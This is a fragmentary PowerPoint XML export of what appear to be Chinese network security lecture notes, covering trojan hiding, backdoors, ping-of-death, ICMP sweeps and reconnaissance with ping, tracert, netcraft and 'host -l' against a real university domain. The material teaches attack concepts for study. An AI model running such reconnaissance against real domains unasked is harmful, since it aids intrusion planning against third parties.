              </a:rPr>
              <a:t>的回显请求和回显应答报文</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7512011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88CCA7CC-7C60-4CAB-936B-D815994FC963}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>273</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120835" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120836"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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>win9x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>时代，简单的注册为系统进程就可以从任务栏中消失，就实现了隐藏。在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Window2000</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，这种方法是不行了，在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>下面（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ctrl+Alt+Del</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可以看到所有正在运行的进程，从而发现木马的进程，也就意味着可以删除它。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188568172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F4BBDE54-FE55-47B1-A9BB-02E721DB45F1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>274</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="694017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29</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6026876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后门一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CD7F3948-5E2B-4E76-80CA-D6145822F124}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>276</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25948764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4D0C9832-35E7-4E15-827D-BDEE6D4E9660}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>277</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" pitchFamily="18"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273011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安全体系结构主要负责建立防线</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>还需有针对攻防态势的响应</a:t>
            </a:r>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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64877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itchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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itchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229545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Yiban9-13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>erban</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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13594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E162F00-EC90-4472-BE7B-62869B60EF53}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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427643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itchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>netcraft.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>可以查询到的大部分知名的网站的信息。比如网站是运行在什么服务器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用什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>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甚至是网站在哪个机房。</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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4102909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50BA9-5D44-4653-9D33-40515475438E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>37</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914400" y="4343400"/>
            <a:ext cx="5029200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Eg:ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> www.sjtu.edu.cn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Eg:tracert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> www.sjtu.edu.cn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0033"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，入侵者可获得保存在目标域服务器中的所有信息,其查询结果所含信息量的多少主要依靠于网络的大小和结构</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Eg:host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>v sjtu.edu.cn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>netcraft.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>可以查询到的大部分知名的网站的信息。比如网站是运行在什么服务器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用什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>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甚至是网站在哪个机房。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2600244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ping of death </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击 是通过在最后分段中，改变其正确的偏移量和段长度的组合，使系统在接收到全部分段并重组报文时总的长度超过了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>65535</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节，导致内存溢出，这时主机就会出现内存分配错误而导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆栈崩溃，导致死机！</a:t>
            </a:r>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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289198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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3681877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2D9A1B-42FE-4F7D-936E-7CA488AF9546}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>48</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4041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itchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1964</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>年</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中国画报</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的一张封面竟成为泄密照。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>照片中，大庆油田的“铁人”王进喜头戴大狗皮帽，身穿厚棉袄，顶着鹅毛大雪，握着钻机手柄眺望远方，在他身后散布着星星点点的高大井架。日本情报专家据此解开了大庆油田之谜。他们根据照片上王进喜的衣着判断，大庆油田位于齐齐哈尔与哈尔滨之间；通过照片中王进喜所握手柄的架式，推断出油井的直径；从王进喜所站的钻井与背后油田间的距离和井架密度，推断出油田的大致储量和产量。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>有了如此多的准确情报，日本人迅速设计出适合大庆油田开采用的石油设备。当我国政府向世界各国征求开采大庆油田的设计方案时，日本人一举中标。</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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203031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3AA7C2-E326-4DAA-A01B-B47395D2D7FA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277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7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5928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30CF54-1AC4-45F8-AA4A-F937BBEE526C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2816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1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970627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AA14D-004F-4643-B271-0D39379983F9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>56</a:t>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3382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C8CE2-69D6-4A53-A600-C48A3C10A46E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30413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41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62779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itchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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itchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109463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EC955-FBD2-4C08-831A-270B93B92CC3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3061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6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t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP ECHO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>轮询多个主机称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP SWEEP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Ping Sweep).</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122968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833BE-E595-4CEE-87AB-FCA85BAADD67}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3082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80660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0B1B1-5259-46B6-8B66-77E65BC3DA6D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3102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0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453103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F3F521-713E-4F4D-AB46-343AE434415A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3123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2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t>不仅仅能探测主机，也可以探测网络设备如路由</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3620803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FC62F-2927-440A-9D77-E762A13D3064}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3143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513689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81E729-1773-462A-8895-C577D3849152}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3164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64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86237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F261A-14ED-48A6-BA16-B9000D9D737B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3184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8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792995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A010F-F528-423B-8400-5C69CE0643FD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3205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0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dirty="0"/>
              <a:t>最大传输单元（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Maximum Transmission Unit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MTU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）是指一种通信协议的某一层上面所能通过的最大数据包大小（以字节为单位）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>以以太网传送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>报文为例。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MTU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>表示的长度包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
